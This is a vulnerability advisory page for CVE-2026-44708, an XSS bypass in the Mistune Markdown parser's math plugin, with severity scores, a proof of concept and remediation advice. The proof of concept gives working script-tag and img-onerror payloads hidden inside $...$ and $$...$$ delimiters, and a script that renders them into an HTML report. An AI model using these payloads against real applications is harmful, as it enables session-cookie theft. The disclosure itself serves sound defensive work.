Skip to main content

Mistune Math Plugin CVE-2026-44708

MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-05-08 https://github.com/lepture/mistune GHSA-8g87-j6q8-g93x
6.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.1 MEDIUM
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
SUSE
MEDIUM
qualitative
Red Hat
6.1 MEDIUM
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
May 09, 2026 - 00:00 vuln.today
Analysis Generated
May 09, 2026 - 00:00 vuln.today
CVE Published
May 08, 2026 - 23:40 nvd
MEDIUM 6.1

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 4 pypi packages depend on mistune (4 direct, 0 indirect)

Ecosystem-wide dependent count for version 3.2.0.

DescriptionGitHub Advisory

Summary

The mistune math plugin renders inline math ($...$) and block math ($$...$$) by concatenating the raw user-supplied content directly into the HTML output without any HTML escaping. This occurs even when the parser is explicitly created with escape=True, which is supposed to guarantee that all user-controlled text is sanitised before reaching the DOM.

The result is a silent contract violation: a developer who enables escape=True reasonably expects complete XSS protection, but the math plugin operates as an independent render path that ignores the renderer's _escape flag entirely.

Details

File: src/mistune/plugins/math.py

python
def render_inline_math(renderer, text):
# `text` is raw user input - no escape() call anywhere
    return r'<span class="math">\(' + text + r"\)</span>"

def render_block_math(renderer, text):
# same issue for block-level $$...$$
    return '<div class="math">$$\n' + text + "\n$$</div>\n"

Both functions take text directly from the parsed token and concatenate it into the output string. Neither function:

  • calls escape(text) from mistune.util
  • checks renderer._escape
  • calls safe_entity(text) or any other sanitisation helper

The escape=True flag only influences the main HTMLRenderer methods (paragraph, heading, codespan, etc.). Plugin render functions registered via md.renderer.register() receive the renderer instance but have no mechanism that enforces the escape contract - they must opt in manually, and math.py does not.

PoC

Step 1 - Establish the baseline (escape=True works for plain HTML)

The script creates a markdown parser with escape=True and the math plugin enabled, then feeds it a raw <script> tag that is *not* inside math delimiters:

python
md = create_markdown(escape=True, plugins=["math"])
bl_src = "<script>alert(document.cookie)</script>\n"
bl_out = str(md(bl_src))

Expected and actual output - the script tag is correctly escaped:

html
<p>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</p>

This confirms escape=True is working for the normal render path.

Step 2 - Craft the exploit payload

Wrap the identical <script> payload inside inline math delimiters $...$. The content is token-extracted as text and handed to render_inline_math():

python
ex_src = "$<script>alert(document.cookie)</script>$\n"
ex_out = str(md(ex_src))

Step 3 - Observe the bypass

Actual output - the script tag is emitted raw, unescaped:

html
<p><span class="math">\(<script>alert(document.cookie)</script>\)</span></p>

The <script> block is live inside the <span class="math"> wrapper. Any browser that renders this HTML will execute alert(document.cookie).

Step 4 - Block math variant ($$...$$)

The same bypass applies to block-level math. Payload:

$$
<img src=x onerror="alert(document.cookie)">
$$

Output:

html
<div class="math">$$
<img src=x onerror="alert(document.cookie)">
$$</div>

The onerror handler fires as soon as the browser tries to load the non-existent image x.

Script

A verification script was written to test this issue. It creates a HTML page showing the bypass rendering in the browser.

python
#!/usr/bin/env python3
"""H1: Math plugin bypasses escape=True - HTML inside $...$ passes through raw."""
import os, html as h
from mistune import create_markdown

md = create_markdown(escape=True, plugins=["math"])
# --- baseline ---
bl_file = "baseline_h1.md"
bl_src  = "<script>alert(document.cookie)</script>\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out = str(md(bl_src))

print(f"[{bl_file}]\n{bl_src}")
print("[output - escape=True works normally here]")
print(bl_out)
# --- exploit ---
ex_file = "exploit_h1.md"
ex_src  = "$<script>alert(document.cookie)</script>$\n"
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out = str(md(ex_src))

print(f"[{ex_file}]\n{ex_src}")
print("[output - escape=True bypassed inside math delimiters]")
print(ex_out)
# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit  .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""

def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} - {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input - {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>Output - HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H1 - Math XSS</title><style>{CSS}</style></head><body>
<h1>H1 - Math Plugin XSS (escape=True bypass)</h1>
<p class="desc">render_inline_math() in plugins/math.py concatenates user content without escape().
The escape=True renderer flag is completely ignored inside $...$ delimiters.</p>
{case("baseline", "Same HTML outside $...$  - escape=True works", bl_file, bl_src, bl_out)}
{case("exploit",  "Same HTML inside $...$   - escape=True bypassed", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h1.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")

Example usage:

bash
python poc.py

Once the script is run, open report_h1.html in the browser and observe the behaviour.

Impact

DimensionAssessment
ConfidentialityAttacker can exfiltrate session cookies, auth tokens, and any data visible to the victim's browser session
IntegrityAttacker can mutate page content, inject phishing forms, redirect the user, or perform authenticated actions
AvailabilityAttacker can crash or freeze the page (denial-of-service to the user)

Risk amplifier: This is a *bypass* of an explicit security control. Developers who have audited their application and confirmed escape=True is set believe they have XSS protection. This vulnerability silently invalidates that assumption for every math-enabled parser instance, making it likely to be missed in code reviews and security audits.

AnalysisAI

Cross-site scripting (XSS) vulnerability in the Mistune markdown parser's math plugin bypasses the escape=True security setting by rendering inline ($...$) and block ($$...$$) math content without HTML escaping. Attackers can inject arbitrary JavaScript that executes in the victim's browser session when a developer-controlled application parses untrusted markdown with the math plugin enabled, even when the parser is explicitly configured to sanitize all user input. Proof-of-concept code demonstrates script tag injection and image onerror handler exploitation; no public exploit code identified at time of analysis.

Technical ContextAI

Mistune is a lightweight markdown parser library used in Python applications to convert user-supplied markdown text to HTML. The math plugin extends the parser to recognize inline math syntax ($...$) and block math syntax ($$...$$), commonly used in documentation and scientific content. The vulnerability exists in src/mistune/plugins/math.py where the render_inline_math() and render_block_math() functions receive parsed token content and concatenate it directly into HTML output strings without calling any sanitization helpers. The root cause is a design flaw in the plugin architecture: the main HTMLRenderer respects the escape=True initialization flag across core methods like paragraph(), heading(), and codespan() by checking renderer._escape and conditionally applying escape(text) from mistune.util. However, plugin render functions registered via md.renderer.register() receive the renderer instance but have no enforced contract to respect the escape flag-they operate as independent code paths and must manually invoke escape helpers. The math plugin does not perform this manual escaping, creating a silent bypass of the security control.

RemediationAI

No vendor-released patch identified at time of analysis. The immediate remediation is to disable the math plugin if it is not essential to the application's functionality by removing plugins=['math'] from the create_markdown() call or using create_markdown(plugins=[...]) without the math plugin. If math rendering is required, implement input validation to reject or sanitize user-supplied markdown that contains math delimiters ($ and $$) before passing it to Mistune, or apply a post-processing HTML sanitizer (such as bleach or nh3) to the rendered output to strip script tags and event handlers regardless of escape settings. A more robust compensating control is to wrap the Mistune renderer and override the math plugin's render functions: register a custom render_inline_math() function that calls escape(text) before concatenating it into the HTML span, and similarly for render_block_math(). This requires code modification but provides comprehensive protection. Any workaround carries the trade-off that legitimate mathematical notation containing special characters may be incorrectly escaped or filtered; test thoroughly with realistic math content before deploying. Monitor the GitHub advisory (https://github.com/lepture/mistune/security/advisories/GHSA-8g87-j6q8-g93x) for upstream patch availability and upgrade immediately once a fixed version is released.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Vendor StatusVendor

SUSE

Severity: Medium
Product Status
SUSE Linux Enterprise Desktop 15 SP7 Fixed
SUSE Linux Enterprise High Performance Computing 15 SP7 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP7 Fixed
SUSE Linux Enterprise Module for Python 3 15 SP7 Fixed
SUSE Linux Enterprise Server 15 SP7 Fixed

Share

CVE-2026-44708 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy